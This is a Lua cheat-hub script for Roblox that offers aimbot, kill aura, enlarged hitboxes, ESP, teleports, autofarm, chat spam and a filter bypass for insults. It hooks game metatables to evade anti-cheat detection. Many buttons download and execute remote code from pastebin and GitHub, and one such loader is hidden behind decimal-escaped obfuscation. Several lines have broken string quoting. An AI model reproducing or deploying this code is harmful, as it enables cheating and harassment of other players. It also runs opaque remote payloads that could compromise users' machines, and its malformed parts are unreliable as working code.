local kavoUi = loadstring(game:HttpGet("https://pastebin.com/raw/vff1bQ9F"))()
local window = kavoUi.CreateLib("coca colaHUB V1.1","BloodTheme")
 
---Tabs
 
local Tab1 = window:NewTab("Main")
local Tab1Section = Tab1:NewSection("Main")
local Tab2 = window:NewTab("Other")
local Tab2Section = Tab2:NewSection("Other")
local Tab3= window:NewTab("Others GUI")
local Tab3Section = Tab3:NewSection("Others GUI'S")
local Tab4 = window:NewTab("OP")
local Tab4Section = Tab4:NewSection("OP")
local Tab5 = window:NewTab("Credits")
local Tab5Section = Tab4:NewSection("Made By Coca cola")
local Tab5Section = Tab4:NewSection("YouTube | Coca cola")
local Tab5Section = Tab4:NewSection("Discord | Vladímir Putin#8138")
local Tab5Section = Tab4:NewSection("Discord Server | https://discord.gg/EF7WddPB")
local Tab5 = window:NewTab("Updates")
local Tab6Section = Tab5:NewSection("V1.1")
 
---Buttons
 
Tab1Section:NewButton("spam","Toxic",function()
 local args = {
    [1] = "ez noob",
    [2] = "All"
} 

game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("SayMessageRequest"):FireServer(unpack(args))
end)

 
Tab1Section:NewButton("god mode,"te regenera",function()
game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-15.48, 788.69, 52.13))
end)  

 
Tab1Section:NewButton("infinite yeld,"admin",function()
 loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
end)

Tab1Section:NewButton("isla","teleport en la isla",function()
  game.Players.LocalPlayer.Character:MoveTo(Vector3.new(63.32, 666.55, 14.04))
end)

 Tab1Section:NewButton("Infinite Jumps","gives you Infinite Jumps",function()
 game:GetService("UserInputService").JumpRequest:connect(function() game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass('Humanoid'):ChangeState("Jumping") end)
end)

Tab1Section:NewButton("60 FPS (ANTI LAG)","decrease game textures",function()
-- Made by RIP#6666
_G.Settings = {
    Players = {
        ["Ignore Me"] = true, -- Ignore your Character
        ["Ignore Others"] = true -- Ignore other Characters
    },
    Meshes = {
        Destroy = false, -- Destroy Meshes
        LowDetail = true -- Low detail meshes (NOT SURE IT DOES ANYTHING)
    },
    Images = {
        Invisible = true, -- Invisible Images
        LowDetail = false, -- Low detail images (NOT SURE IT DOES ANYTHING)
        Destroy = false, -- Destroy Images
    },
    Other = {
        ["No Particles"] = true, -- Disables all ParticleEmitter, Trail, Smoke, Fire and Sparkles
        ["No Camera Effects"] = true, -- Disables all PostEffect's (Camera/Lighting Effects)
        ["No Explosions"] = true, -- Makes Explosion's invisible
        ["No Clothes"] = true, -- Removes Clothing from the game
        ["Low Water Graphics"] = true, -- Removes Water Quality
        ["No Shadows"] = true, -- Remove Shadows
        ["Low Rendering"] = true, -- Lower Rendering
        ["Low Quality Parts"] = true -- Lower quality parts
    }
}
loadstring(game:HttpGet("https://raw.githubusercontent.com/CasperFlyModz/discord.gg-rips/main/FPSBooster.lua"))()
end)

Tab1Section:NewButton("fly mobile","puedes volar",function()
 loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")()
end)

Tab1Section:NewButton("Chat Bypass","You can say insults without Roblox censoring you",function()
game:GetService("StarterGui"):SetCore("SendNotification", { 
        Title = "script made by : Spooky Dragon ";
        Text = "Showcaser Spooky Dragon ";
        Icon = "rbxthumb://"})
    Duration = 16;
 
wait(3.0)
 
loadstring(game:HttpGet(('https://pastebin.com/raw/B11Pu5vS'),true))()
end)

Tab1Section:NewButton("bypass fly","volar sin morir",function(v)
local plr = game:GetService("Players").LocalPlayer;

local old;
old = hookmetamethod(game, "__index", function(self, key)
   if not checkcaller() and key == "PlatformStand" and self.ClassName == "Humanoid" and self.Parent and plr.Character and self.Parent == plr.Character then -- Prevents PlatformStanding detections
       return false
   end
   return old(self, key)
end)

game.DescendantAdded:Connect(function(d)
   if d.ClassName:find("Body") and plr.Character and d:IsDescendantOf(plr.Character) then
       
       local old_idx;
       local old_nc;
       
       old_idx = hookmetamethod(d, "__index", newcclosure(function(self, ...) -- Prevent indexing (checking properties, name, etc)
           if not checkcaller() and self == d then
               local s,e = pcall(old_idx, self, ...)
               
               if not s then
                   return error(e)
               end
               return
           end
           return old_idx(self, ...)
       end))
       
       old_nc = hookmetamethod(d, "__namecall", newcclosure(function(self, ...) -- Prevent namecalling (functions)
           if not checkcaller() and self == d then
               local s,e = pcall(old_nc, self, ...)
               
               if not s then
                   return error(e)
               end
               return
           end
           return old_nc(self, ...)
       end))
   end
end)
end)   

Tab2Section:NewButton("ESP Player","See the people through the walls",function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/TheNuggetEater05/ekaMiffutSmodnaR/main/GlobalR6SkeletonESP.lua"))()
 
shared.BoneESP_Settings = {
    Circle_Visible = false,
    Circle_Radius = 3,
    BoneESP_Color = Color3.fromRGB(255,255,255)
}
end)

Tab2Section:NewButton("AIMBOT Bow","Automatically shoot the closest enemy",function()
local Camera = game:GetService("Workspace").CurrentCamera
local Players = game:GetService("Players")
local LocalPlayer = game:GetService("Players").LocalPlayer
 
local function GetClosestPlayer()
   local ClosestPlayer = nil
   local FarthestDistance = math.huge
 
   for i, v in pairs(Players.GetPlayers(Players)) do
       if v ~= LocalPlayer and v.Character and v.Character.FindFirstChild(v.Character, "HumanoidRootPart") then
           local DistanceFromPlayer = (LocalPlayer.Character.HumanoidRootPart.Position - v.Character.HumanoidRootPart.Position).Magnitude
 
           if DistanceFromPlayer < FarthestDistance then
               FarthestDistance = DistanceFromPlayer
               ClosestPlayer = v
           end
       end
   end
 
   if ClosestPlayer then
       return ClosestPlayer
   end
end
 
local GameMetaTable = getrawmetatable(game)
local OldGameMetaTableNamecall = GameMetaTable.__namecall
setreadonly(GameMetaTable, false)
 
GameMetaTable.__namecall = newcclosure(function(object, ...)
   local NamecallMethod = getnamecallmethod()
   local Arguments = {...}
 
   if tostring(NamecallMethod) == "FindPartOnRayWithIgnoreList" then
       local ClosestPlayer = GetClosestPlayer()
 
       if ClosestPlayer and ClosestPlayer.Character then
           Arguments[1] = Ray.new(Camera.CFrame.Position, (ClosestPlayer.Character.Head.Position - Camera.CFrame.Position).Unit * (Camera.CFrame.Position - ClosestPlayer.Character.Head.Position).Magnitude)
       end
   end
 
   return OldGameMetaTableNamecall(object, unpack(Arguments))
end)
 
setreadonly(GameMetaTable, true)
end)

Tab2Section:NewButton("autofarm","minar minerales",function() 
local cpos = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame

	local stuff = workspace:getDescendants()
	for i=1,#stuff do
		if stuff[i].Name == "Block" and stuff[i].Parent.Name == "Ores" then
			repeat
				wait()
				game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = stuff[i].CFrame
				game.Players.LocalPlayer.Character.Axe.RemoteEvent:FireServer(stuff[i])
			until stuff[i].Name ~= "Block" or not game.Players.LocalPlayer.Character:findFirstChild("Axe")
		end
	end

	game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = cpos
    end)

Tab2Section:NewButton("sword mesh","No description",function()
local playerName = game.Players.LocalPlayer.Name
	    game.Workspace:FindFirstChild(playerName).Sword.Handle.Mesh:Destroy()
    end)

Tab2Section:NewButton("God mode (Not working)","shield inf",function()
local playerName = game.Players.LocalPlayer.Name

        game.Players.LocalPlayer.Character:FindFirstChild("Shield"):Activate()
        wait (1)
        game.Workspace:FindFirstChild(playerName).Shield.ShieldPotion:Destroy()
    end)

Tab2Section:NewButton("Sword Fight bot","No description",function()
loadstring(game:HttpGet(('https://raw.githubusercontent.com/EpikBirdo/ok-and/main/bigchungusporn'),true))()
end)

Tab2Section:NewButton("Realistic Mode","No description",function()
if not _G.FullBrightExecuted then

	_G.FullBrightEnabled = false

	_G.NormalLightingSettings = {
		Brightness = game:GetService("Lighting").Brightness,
		ClockTime = game:GetService("Lighting").ClockTime,
		FogEnd = game:GetService("Lighting").FogEnd,
		GlobalShadows = game:GetService("Lighting").GlobalShadows,
		Ambient = game:GetService("Lighting").Ambient
	}

	game:GetService("Lighting"):GetPropertyChangedSignal("Brightness"):Connect(function()
		if game:GetService("Lighting").Brightness ~= 1 and game:GetService("Lighting").Brightness ~= _G.NormalLightingSettings.Brightness then
			_G.NormalLightingSettings.Brightness = game:GetService("Lighting").Brightness
			if not _G.FullBrightEnabled then
				repeat
					wait()
				until _G.FullBrightEnabled
			end
			game:GetService("Lighting").Brightness = 1
		end
	end)

	game:GetService("Lighting"):GetPropertyChangedSignal("ClockTime"):Connect(function()
		if game:GetService("Lighting").ClockTime ~= 12 and game:GetService("Lighting").ClockTime ~= _G.NormalLightingSettings.ClockTime then
			_G.NormalLightingSettings.ClockTime = game:GetService("Lighting").ClockTime
			if not _G.FullBrightEnabled then
				repeat
					wait()
				until _G.FullBrightEnabled
			end
			game:GetService("Lighting").ClockTime = 12
		end
	end)

	game:GetService("Lighting"):GetPropertyChangedSignal("FogEnd"):Connect(function()
		if game:GetService("Lighting").FogEnd ~= 786543 and game:GetService("Lighting").FogEnd ~= _G.NormalLightingSettings.FogEnd then
			_G.NormalLightingSettings.FogEnd = game:GetService("Lighting").FogEnd
			if not _G.FullBrightEnabled then
				repeat
					wait()
				until _G.FullBrightEnabled
			end
			game:GetService("Lighting").FogEnd = 786543
		end
	end)

	game:GetService("Lighting"):GetPropertyChangedSignal("GlobalShadows"):Connect(function()
		if game:GetService("Lighting").GlobalShadows ~= false and game:GetService("Lighting").GlobalShadows ~= _G.NormalLightingSettings.GlobalShadows then
			_G.NormalLightingSettings.GlobalShadows = game:GetService("Lighting").GlobalShadows
			if not _G.FullBrightEnabled then
				repeat
					wait()
				until _G.FullBrightEnabled
			end
			game:GetService("Lighting").GlobalShadows = false
		end
	end)

	game:GetService("Lighting"):GetPropertyChangedSignal("Ambient"):Connect(function()
		if game:GetService("Lighting").Ambient ~= Color3.fromRGB(178, 178, 178) and game:GetService("Lighting").Ambient ~= _G.NormalLightingSettings.Ambient then
			_G.NormalLightingSettings.Ambient = game:GetService("Lighting").Ambient
			if not _G.FullBrightEnabled then
				repeat
					wait()
				until _G.FullBrightEnabled
			end
			game:GetService("Lighting").Ambient = Color3.fromRGB(178, 178, 178)
		end
	end)

	game:GetService("Lighting").Brightness = 1
	game:GetService("Lighting").ClockTime = 12
	game:GetService("Lighting").FogEnd = 786543
	game:GetService("Lighting").GlobalShadows = false
	game:GetService("Lighting").Ambient = Color3.fromRGB(178, 178, 178)

	local LatestValue = true
	spawn(function()
		repeat
			wait()
		until _G.FullBrightEnabled
		while wait() do
			if _G.FullBrightEnabled ~= LatestValue then
				if not _G.FullBrightEnabled then
					game:GetService("Lighting").Brightness = _G.NormalLightingSettings.Brightness
					game:GetService("Lighting").ClockTime = _G.NormalLightingSettings.ClockTime
					game:GetService("Lighting").FogEnd = _G.NormalLightingSettings.FogEnd
					game:GetService("Lighting").GlobalShadows = _G.NormalLightingSettings.GlobalShadows
					game:GetService("Lighting").Ambient = _G.NormalLightingSettings.Ambient
				else
					game:GetService("Lighting").Brightness = 1
					game:GetService("Lighting").ClockTime = 12
					game:GetService("Lighting").FogEnd = 786543
					game:GetService("Lighting").GlobalShadows = false
					game:GetService("Lighting").Ambient = Color3.fromRGB(178, 178, 178)
				end
				LatestValue = not LatestValue
			end
		end
	end)
end

_G.FullBrightExecuted = true
_G.FullBrightEnabled = not _G.FullBrightEnabled
end)	

Tab2Section:NewButton("sword mesh","No description",function()
 game.workspace.Lobby.KillPlates:remove()
        game.workspace.Borders.InvisibleBorder:remove()
        end)

Tab2Section:NewButton("Destroy sword Animation","No description",function()
local playerName = game.Players.LocalPlayer.Name
	    game.Workspace:FindFirstChild(playerName).Sword.LocalSwordAnimation:Destroy()
     end)

Tab2Section:NewButton("Axe mesh","No description",function()
local playerName = game.Players.LocalPlayer.Name
	    game.Workspace:FindFirstChild(playerName).Axe.Handle.Mesh:Destroy()
    end)

Tab2Section:NewButton("Bow mesh","No description",function()
local playerName = game.Players.LocalPlayer.Name
	    game.Workspace:FindFirstChild(playerName).Bow.Handle.Mesh:Destroy()
    end)

Tab3Section:NewButton("Hawk HUB","No description",function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/TheHanki/Hawk/main/Loader", true))()
end)

Tab3Section:NewButton("5N1K Hub (Not working)","No description",function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/cihonemm/5N1K-HUB-again-/main/5N1K%20HUB'))()
end)

Tab3Section:NewButton("KebabWare GUI","No description",function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/Sempiller/kebabware/main/out%20(1).lua%20(6).txt'))();
end)

Tab3Section:NewButton("Skyfucker","No description",function()
local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/vqfx/SytroNight4ROBLOX/main/libraries/kavo.lua"))() 
local Window = Library.CreateLib("SkyFucker V1.1", "Synapse")
 
--Combat
local Combat = Window:NewTab("Combat")
local CombatSection = Combat:NewSection("Combat")
 
CombatSection:NewButton("Hitbox", "Hitbox", function()
    _G.HeadSize = 25
_G.Disabled = true
 
game:GetService('RunService').RenderStepped:connect(function()
if _G.Disabled then
for i,v in next, game:GetService('Players'):GetPlayers() do
if v.Name ~= game:GetService('Players').LocalPlayer.Name then
pcall(function()
v.Character.HumanoidRootPart.Size = Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize)
v.Character.HumanoidRootPart.Transparency = 0.7
v.Character.HumanoidRootPart.BrickColor = BrickColor.new("Really black")
v.Character.HumanoidRootPart.Material = "Neon"
v.Character.HumanoidRootPart.CanCollide = false
end)
end
end
end
end)
end)
 
CombatSection:NewButton("Auto Sword", "Auto Swing Sword", function()
    --By ArceusModz
--Fixed by roblox_man38
--ez fix ngl
 
 
--// Setting \--
local range = 99e9
 
--// Variable \--
local player = game:GetService("Players").LocalPlayer
 
--// Script \--
game:GetService("RunService").RenderStepped:Connect(function()
    local p = game.Players:GetPlayers()
    for i = 2, #p do local v = p[i].Character
        if v and v:FindFirstChild("Humanoid") and v.Humanoid.Health > 0 and v:FindFirstChild("HumanoidRootPart") and player:DistanceFromCharacter(v.HumanoidRootPart.Position) <= range then
            local tool = player.Character and player.Character:FindFirstChildOfClass("Tool")
            if tool and tool:FindFirstChild("Handle") then
                tool:Activate()
                for i,v in next, v:GetChildren() do
                    if v:IsA("BasePart") then
                        firetouchinterest(tool.Handle,v,0)
                        firetouchinterest(tool.Handle,v,1)
                    end
                end
            end
        end
    end
end)
end)

--Player Misc
local Misc = Window:NewTab("Misc")
local MiscSection = Misc:NewSection("Misc")
 
MiscSection:NewButton("Inf Jump", "Inf Jump", function()
    local InfiniteJumpEnabled = true
game:GetService("UserInputService").JumpRequest:connect(function()
	if InfiniteJumpEnabled then
		game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping")
	end
end)
end)
 
MiscSection:NewButton("Inf Yeild", "Admin Bascily", function()
    defaultsettings = {
        prefix = ';';
        StayOpen = false;
        keepIY = true;
        logsEnabled = false;
        jLogsEnabled = false;
        aliases = {};
        binds = {};
        WayPoints = {};
        PluginsTable = {};
    }
 
    defaults = game:GetService("HttpService"):JSONEncode(defaultsettings)
 
    writefile("IY_FE.iy",defaults)
 
 
    loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
end)
 
MiscSection:NewButton("Godmode", "Godmode", function()
    -- FE Invisible
 
Local = game:GetService('Players').LocalPlayer
Char  = Local.Character
touched,tpdback = false, false
Local.CharacterAdded:connect(function(char)
    if script.Disabled ~= true then
        wait(.25)
        loc = Char.HumanoidRootPart.Position
        Char:MoveTo(box.Position + Vector3.new(0,.5,0))
    end
end)
game:GetService('UserInputService').InputBegan:connect(function(key)
    if key.KeyCode == Enum.KeyCode.Equals then
        if script.Disabled ~= true then
            script.Disabled = true
            print'you may re-execute'
        end
    end
end)
box = Instance.new('Part',workspace)
box.Anchored = true
box.CanCollide = true
box.Size = Vector3.new(10,1,10)
box.Position = Vector3.new(0,10000,0)
box.Touched:connect(function(part)
    if (part.Parent.Name == Local.Name) then
        if touched == false then
            touched = true
            function apply()
                if script.Disabled ~= true then
                    no = Char.HumanoidRootPart:Clone()
                    wait(.25)
                    Char.HumanoidRootPart:Destroy()
                    no.Parent = Char
                    Char:MoveTo(loc)
                    touched = false
                end end
            if Char then
                apply()
            end
        end
    end
end)
repeat wait() until Char
loc = Char.HumanoidRootPart.Position
Char:MoveTo(box.Position + Vector3.new(0,.5,0))
end)
 
--Updates
local Updates = Window:NewTab("Update")
local UpdateSection = Updates:NewSection("Updates")
 
UpdateSection:NewLabel("Sorry Note: A free pack script is imposible.")
 
UpdateSection:NewLabel("1.1 Released")
 
UpdateSection:NewLabel("1.0 Released!")
 
UpdateSection:NewButton("Thank You :D", ":D", function()
    print("--Thank You--")
end)
 
--Credits
local Credits = Window:NewTab("Credits")
local CreditsSection = Credits:NewSection("Credits:")
 
CreditsSection:NewLabel("Script Owner: Coca on YT")
 
CreditsSection:NewLabel("Very pog script helpers maxi|Script dev")
 
CreditsSection:NewButton("Ended", ":D", function()
    print("--Thank You--")
end)
end)

Tab3Section:NewButton("Offioa Hub V4,"No description",function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/coca001/Offioa-Hub-V4/main/source"))()
end)

Tab4Section:NewButton("kill aura","No description",function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/coca001/kill-aura-pro/main/source"))()
end)

Tab4Section:NewButton("destroy sky","No description",function()
game.Lighting.Sky:Destroy()
end)

Tab4Section:NewButton("Sky galaxy","No description",function()
local lighting = game:GetService("Lighting")
wait(15)
lighting.ClockTime = 6

wait(10)
lighting.ClockTime = 20
end)

Tab4Section:NewButton("Armor troll","No description",function()
character = game:GetService("Players").LocalPlayer.Character

--R6 Rigs
rightLeg = character:FindFirstChild("Right Leg")
if rightLeg then rightLeg:Destroy() end
end)

Tab4Section:NewButton("Armor","No description",function()
game.Players.LocalPlayer.Character:MoveTo(Vector3.new(-11.26, 263.52, 61.06))
end)

Tab4Section:NewButton("Hat Spin","No description",function()
loadstring(game:HttpGet("https://pastebin.com/raw/wZn7yAB7",true))()
end)

Tab5Section:NewButton("--- Optimized","No description",function()
end)

Tab5Section:NewButton("--- More options added","No description",function()
end)

Tab5Section:NewButton("--- Updated Scripts working/Not working","No description",function()
end)

Tab5Section:NewButton("--- Name change","No description",function()
end)

Tab5Section:NewButton("--- Fixed working for hydrogen","No description",function()
end)
